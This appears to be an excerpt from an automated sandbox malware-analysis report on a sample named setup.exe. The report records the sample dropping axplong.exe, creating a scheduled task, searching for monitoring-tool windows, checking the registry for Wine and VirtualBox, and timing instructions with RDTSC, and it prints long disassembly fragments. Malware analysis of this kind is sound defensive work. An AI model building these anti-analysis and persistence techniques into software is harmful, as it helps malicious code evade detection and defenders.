File created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CEFED second address: 3CE8A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F808D4B80C7h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f or dword ptr [ebp+122D1C24h], ecx 0x00000015 push dword ptr [ebp+122D1401h] 0x0000001b jmp 00007F808D4B80C5h 0x00000020 call dword ptr [ebp+122D1850h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D1BC4h], ecx 0x0000002d xor eax, eax 0x0000002f sub dword ptr [ebp+122D2790h], edx 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 add dword ptr [ebp+122D1BC4h], eax 0x0000003f pushad 0x00000040 mov edx, 607D7F57h 0x00000045 mov dword ptr [ebp+122D193Bh], edi 0x0000004b popad 0x0000004c mov dword ptr [ebp+122D2A3Fh], eax 0x00000052 jmp 00007F808D4B80BBh 0x00000057 mov esi, 0000003Ch 0x0000005c sub dword ptr [ebp+122D1C5Ch], eax 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 mov dword ptr [ebp+122D2790h], ecx 0x0000006c jno 00007F808D4B80B7h 0x00000072 lodsw 0x00000074 pushad 0x00000075 pushad 0x00000076 xor ebx, dword ptr [ebp+122D2AFFh] 0x0000007c add edx, 763E7B1Eh 0x00000082 popad 0x00000083 xor dword ptr [ebp+122D1C5Ch], ecx 0x00000089 popad 0x0000008a add eax, dword ptr [esp+24h] 0x0000008e jmp 00007F808D4B80BFh 0x00000093 or dword ptr [ebp+122D2790h], eax 0x00000099 mov ebx, dword ptr [esp+24h] 0x0000009d pushad 0x0000009e ja 00007F808D4B80BCh 0x000000a4 popad 0x000000a5 push eax 0x000000a6 jo 00007F808D4B80C8h 0x000000ac push eax 0x000000ad push edx 0x000000ae jng 00007F808D4B80B6h 0x000000b4 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CE8A1 second address: 3CE8A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 52E55D second address: 52E564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 52E564 second address: 52E56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BBA5 second address: 54BBAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BCCE second address: 54BCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BCD2 second address: 54BCD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BCD8 second address: 54BCE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BCE7 second address: 54BCEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BCEB second address: 54BD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jc 00007F808D280526h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BD02 second address: 54BD08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BE6B second address: 54BE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54BE78 second address: 54BE84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F808D4B80B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54C028 second address: 54C02C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54C412 second address: 54C41E instructions: 0x00000000 rdtsc 0x00000002 js 00007F808D4B80B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54C41E second address: 54C424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54C424 second address: 54C43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54C43F second address: 54C443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F7D1 second address: 54F7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F7E3 second address: 54F7E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F7E7 second address: 54F813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jnc 00007F808D4B80BCh 0x00000010 jo 00007F808D4B80B6h 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F808D4B80BEh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F813 second address: 54F832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F808D280530h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F832 second address: 3CE8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jp 00007F808D4B80CEh 0x00000010 pop eax 0x00000011 mov ecx, 1BCE0BE9h 0x00000016 push dword ptr [ebp+122D1401h] 0x0000001c call dword ptr [ebp+122D1850h] 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D1BC4h], ecx 0x00000029 xor eax, eax 0x0000002b sub dword ptr [ebp+122D2790h], edx 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 add dword ptr [ebp+122D1BC4h], eax 0x0000003b pushad 0x0000003c mov edx, 607D7F57h 0x00000041 mov dword ptr [ebp+122D193Bh], edi 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D2A3Fh], eax 0x0000004e jmp 00007F808D4B80BBh 0x00000053 mov esi, 0000003Ch 0x00000058 sub dword ptr [ebp+122D1C5Ch], eax 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 mov dword ptr [ebp+122D2790h], ecx 0x00000068 jno 00007F808D4B80B7h 0x0000006e lodsw 0x00000070 pushad 0x00000071 pushad 0x00000072 xor ebx, dword ptr [ebp+122D2AFFh] 0x00000078 add edx, 763E7B1Eh 0x0000007e popad 0x0000007f xor dword ptr [ebp+122D1C5Ch], ecx 0x00000085 popad 0x00000086 add eax, dword ptr [esp+24h] 0x0000008a jmp 00007F808D4B80BFh 0x0000008f or dword ptr [ebp+122D2790h], eax 0x00000095 mov ebx, dword ptr [esp+24h] 0x00000099 pushad 0x0000009a ja 00007F808D4B80BCh 0x000000a0 popad 0x000000a1 push eax 0x000000a2 jo 00007F808D4B80C8h 0x000000a8 push eax 0x000000a9 push edx 0x000000aa jng 00007F808D4B80B6h 0x000000b0 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F877 second address: 54F90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F808D28052Eh 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F808D280530h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F808D280528h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov dl, A3h 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D25FFh], edx 0x00000035 mov dword ptr [ebp+122D180Ah], ebx 0x0000003b popad 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F808D280528h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D2E2Bh], ecx 0x0000005e call 00007F808D280529h 0x00000063 jmp 00007F808D28052Bh 0x00000068 push eax 0x00000069 pushad 0x0000006a push edi 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F90D second address: 54F947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F808D4B80BAh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F808D4B80CEh 0x0000001d jmp 00007F808D4B80C8h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F947 second address: 54F961 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D280528h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e je 00007F808D280530h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54F961 second address: 54FA04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+122D279Bh] 0x0000000d push 00000003h 0x0000000f mov cl, al 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F808D4B80B8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d js 00007F808D4B80BCh 0x00000033 sub edx, dword ptr [ebp+122D2A8Bh] 0x00000039 push 00000003h 0x0000003b mov dword ptr [ebp+122D367Fh], edx 0x00000041 push D413493Fh 0x00000046 jmp 00007F808D4B80BEh 0x0000004b xor dword ptr [esp], 1413493Fh 0x00000052 jmp 00007F808D4B80C1h 0x00000057 lea ebx, dword ptr [ebp+12454711h] 0x0000005d mov dword ptr [ebp+122D1C17h], edi 0x00000063 jmp 00007F808D4B80C0h 0x00000068 push eax 0x00000069 pushad 0x0000006a pushad 0x0000006b pushad 0x0000006c popad 0x0000006d jno 00007F808D4B80B6h 0x00000073 popad 0x00000074 push eax 0x00000075 push edx 0x00000076 jg 00007F808D4B80B6h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FA82 second address: 54FA87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FA87 second address: 54FAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D4B80C8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FAAB second address: 54FAB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FAB9 second address: 54FAF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2B4Dh], edi 0x00000012 push 00000000h 0x00000014 sub dword ptr [ebp+122D1940h], ebx 0x0000001a call 00007F808D4B80B9h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FAF2 second address: 54FAF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FC39 second address: 54FC3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FC3F second address: 54FCE1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, cx 0x0000000c push 00000000h 0x0000000e mov edi, eax 0x00000010 jmp 00007F808D28052Dh 0x00000015 call 00007F808D280529h 0x0000001a pushad 0x0000001b push edx 0x0000001c jng 00007F808D280526h 0x00000022 pop edx 0x00000023 jbe 00007F808D280528h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F808D280536h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 jnp 00007F808D28053Eh 0x0000003b jmp 00007F808D280538h 0x00000040 push edi 0x00000041 jmp 00007F808D280533h 0x00000046 pop edi 0x00000047 popad 0x00000048 mov eax, dword ptr [eax] 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d jmp 00007F808D280534h 0x00000052 pop eax 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FCE1 second address: 54FCFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e jg 00007F808D4B80BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FCFF second address: 54FD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 jne 00007F808D28052Bh 0x0000000c add dx, 5114h 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F808D280528h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d jnl 00007F808D28052Ch 0x00000033 push 00000000h 0x00000035 jmp 00007F808D280538h 0x0000003a push 00000003h 0x0000003c push edx 0x0000003d mov dword ptr [ebp+122D1945h], ecx 0x00000043 pop edi 0x00000044 push ABAE2E9Eh 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e pop eax 0x0000004f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FD69 second address: 54FD86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FD86 second address: 54FDF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007F808D280526h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 1451D162h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F808D280528h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov si, ax 0x00000030 mov dword ptr [ebp+122D37A5h], ebx 0x00000036 lea ebx, dword ptr [ebp+12454725h] 0x0000003c mov edi, dword ptr [ebp+122D2A97h] 0x00000042 mov esi, dword ptr [ebp+122D1940h] 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F808D280539h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FDF3 second address: 54FDF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FDF9 second address: 54FDFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54FDFD second address: 54FE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jl 00007F808D4B80BCh 0x00000010 jo 00007F808D4B80B6h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53D770 second address: 53D776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56DFD2 second address: 56DFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56DFD8 second address: 56DFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56DFE2 second address: 56DFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56E154 second address: 56E15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F808D280526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56E15E second address: 56E162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56E29B second address: 56E2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F808D280526h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jng 00007F808D280541h 0x00000013 jmp 00007F808D280535h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56E2C5 second address: 56E2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56E44F second address: 56E45E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F808D280526h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56E45E second address: 56E464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56EB5D second address: 56EB74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F808D28052Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56EB74 second address: 56EBAA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F808D4B80B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F808D4B80BAh 0x00000017 pop edi 0x00000018 jmp 00007F808D4B80C9h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56EBAA second address: 56EBB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56EBB0 second address: 56EBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56ED1F second address: 56ED3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D280537h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56EEBA second address: 56EED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56EED2 second address: 56EEDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56EEDC second address: 56EEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56F166 second address: 56F16A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 563308 second address: 56330C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56330C second address: 563316 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
